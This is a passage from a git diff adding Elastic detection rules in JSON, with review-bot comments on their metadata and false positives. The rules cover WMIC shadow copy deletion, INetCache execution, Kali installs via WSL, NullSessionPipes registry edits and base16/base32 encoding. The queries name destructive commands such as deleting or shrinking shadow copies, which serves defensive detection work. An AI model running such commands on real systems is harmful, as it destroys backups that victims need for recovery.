compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"WMIC.exe\" or ?process.pe.original_file_name == \"wmic.exe\") and\n process.args : \"delete\" and process.args : \"shadowcopy\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_1.json b/packages/security_detection_engine/kibana/security_rule/dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_1.json new file mode 100644 index 00000000000..8edb11b3bed --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_1.json 
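Review bot: `index` lists `logs-system.security*` but `related_integrations` declares only `endpoint` and `windows`, whereas the other rules in this change that read that data stream (`dca6b4b0-…`, `dd34b062-…`) also declare `{"package": "system", "version": "^1.6.4"}`; either add that entry or drop the index pattern so the packaging metadata matches what the rule queries. The `note` also carries a step that looks copied from the VssAdmin guide — "In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB" — which cannot apply here because the query matches only `delete`; drop it, or if storage shrinking via `wmic shadowstorage … set MaxSpace=` is presumably meant to be covered too, the query would need to match that as well. Minor: `?process.pe.original_file_name == "wmic.exe"` uses the case-sensitive `==` while the sibling `process.name : "WMIC.exe"` is case-insensitive; `:` would be the consistent choice. The `_109` snapshot in this change has the same gaps.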
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a process with arguments pointing to the INetCache Folder. Adversaries may deliver malicious content via WININET during initial access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution from INET Cache", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and \n process.parent.name : (\"explorer.exe\", \"winrar.exe\", \"7zFM.exe\", \"Bandizip.exe\") and\n (process.args : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\" or\n process.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\")\n", + "references": [ + "https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "dca6b4b0-ae70-44eb-bb7a-ce6db502ee78", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Command and Control", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_2.json b/packages/security_detection_engine/kibana/security_rule/dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_2.json new file mode 100644 index 00000000000..bf63cf755fa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_2.json 
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a process with arguments pointing to the INetCache Folder. Adversaries may deliver malicious content via WININET during initial access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution from INET Cache", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and \n process.parent.name : (\"explorer.exe\", \"winrar.exe\", \"7zFM.exe\", \"Bandizip.exe\") and\n (process.args : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\" or\n process.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\")\n", + "references": [ + "https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "dca6b4b0-ae70-44eb-bb7a-ce6db502ee78", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Command and Control", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": 
"MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "dca6b4b0-ae70-44eb-bb7a-ce6db502ee78_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_7.json b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_7.json new file mode 100644 index 00000000000..94e641e62b0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_7.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to install or use Kali Linux via Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Install Kali Linux via WSL", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (process.name : \"wsl.exe\" and process.args : (\"-d\", \"--distribution\", \"-i\", \"--install\") and process.args : \"kali*\") or \n process.executable : \n (\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\packages\\\\kalilinux*\", \n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\WindowsApps\\\\kali.exe\",\n \"?:\\\\Program Files*\\\\WindowsApps\\\\KaliLinux.*\\\\kali.exe\")\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/wsl/wsl-config" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + 
"name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_107.json b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_107.json new file mode 100644 index 00000000000..e8d84006dc5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_107.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "NullSessionPipe Registry Modification", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) > 0\n", + "references": [ + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ddab1f5f-7089-44f5-9fda-de5b11322e77", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", 
+ "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "ddab1f5f-7089-44f5-9fda-de5b11322e77_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_108.json b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_108.json new file mode 100644 index 00000000000..2da8f44f8e9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_108.json 
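Review bot: `length(registry.data.strings) > 0` alerts on every non-empty write to NullSessionPipes, which may include the value being re-applied by the Group Policy setting "Network access: Named Pipes that can be accessed anonymously" and by server roles that legitimately register pipes there, yet the rule carries no `false_positives` entry. Add one such as `"Group Policy refreshes and server roles that legitimately populate NullSessionPipes; baseline the expected pipe names and add exceptions on registry.data.strings rather than disabling the rule."` so operators have a tuning path. It is also worth stating in the description that clearing the value (a hardening action) is intentionally out of scope, since the `> 0` guard silently drops it. The ddab1f5f-7089-44f5-9fda-de5b11322e77_108 hunk carries the identical query and needs the same entry.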
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "NullSessionPipe Registry Modification", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) > 0\n", + "references": [ + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ddab1f5f-7089-44f5-9fda-de5b11322e77", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "ddab1f5f-7089-44f5-9fda-de5b11322e77_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_109.json b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_109.json new file mode 100644 index 00000000000..29420415103 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_109.json 
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious child process of the Windows virtual system process, which could indicate code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Process from a System Virtual Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.pid == 4 and process.executable : \"?*\" and\n not process.executable : (\"Registry\", \"MemCompression\", \"?:\\\\Windows\\\\System32\\\\smss.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": 
"MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_110.json b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_110.json new file mode 100644 index 00000000000..c78a5a92ec9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_110.json 
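Review bot: The exclusion `not process.executable : ("Registry", "MemCompression", "?:\\Windows\\System32\\smss.exe")` hard-codes the minimal processes expected under pid 4, but nothing in the rule explains why these are benign or what an operator should do when telemetry shows another pid-4 child; hosts with virtualization-based security appear to also report a `Secure System` minimal process under System, which would alert here (verify the exact executable value in your endpoint data before excluding it). A `false_positives` entry such as `"Kernel-created minimal processes (Registry, Memory Compression, and possibly Secure System on VBS-enabled hosts) are expected children of pid 4; add exceptions only after confirming the executable name in your telemetry."` would give that guidance without widening the query. The de9bd7e0-49e9-4e92-a64d-53ade2e66af1_110 hunk has the identical query and exclusion list and should get the same entry.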
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious child process of the Windows virtual system process, which could indicate code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Process from a System Virtual Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.pid == 4 and process.executable : \"?*\" and\n not process.executable : (\"Registry\", \"MemCompression\", \"?:\\\\Windows\\\\System32\\\\smss.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + 
"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_108.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_108.json new file mode 100644 index 00000000000..ae1e2297d3f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_108.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls.", + "false_positives": [ + "Automated tools such as Jenkins may encode or decode files as part of their normal behavior. These events can be filtered by the process executable or username values." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Base16 or Base32 Encoding/Decoding Activity", + "query": "process where host.os.type == \"linux\" and event.type in (\"start\", \"process_started\") and\nprocess.name in (\"base16\", \"base32\", \"base32plain\", \"base32hex\") and not process.args in (\"--help\", \"--version\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "debff20a-46bc-4a4d-bae5-5cdd14222795", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": 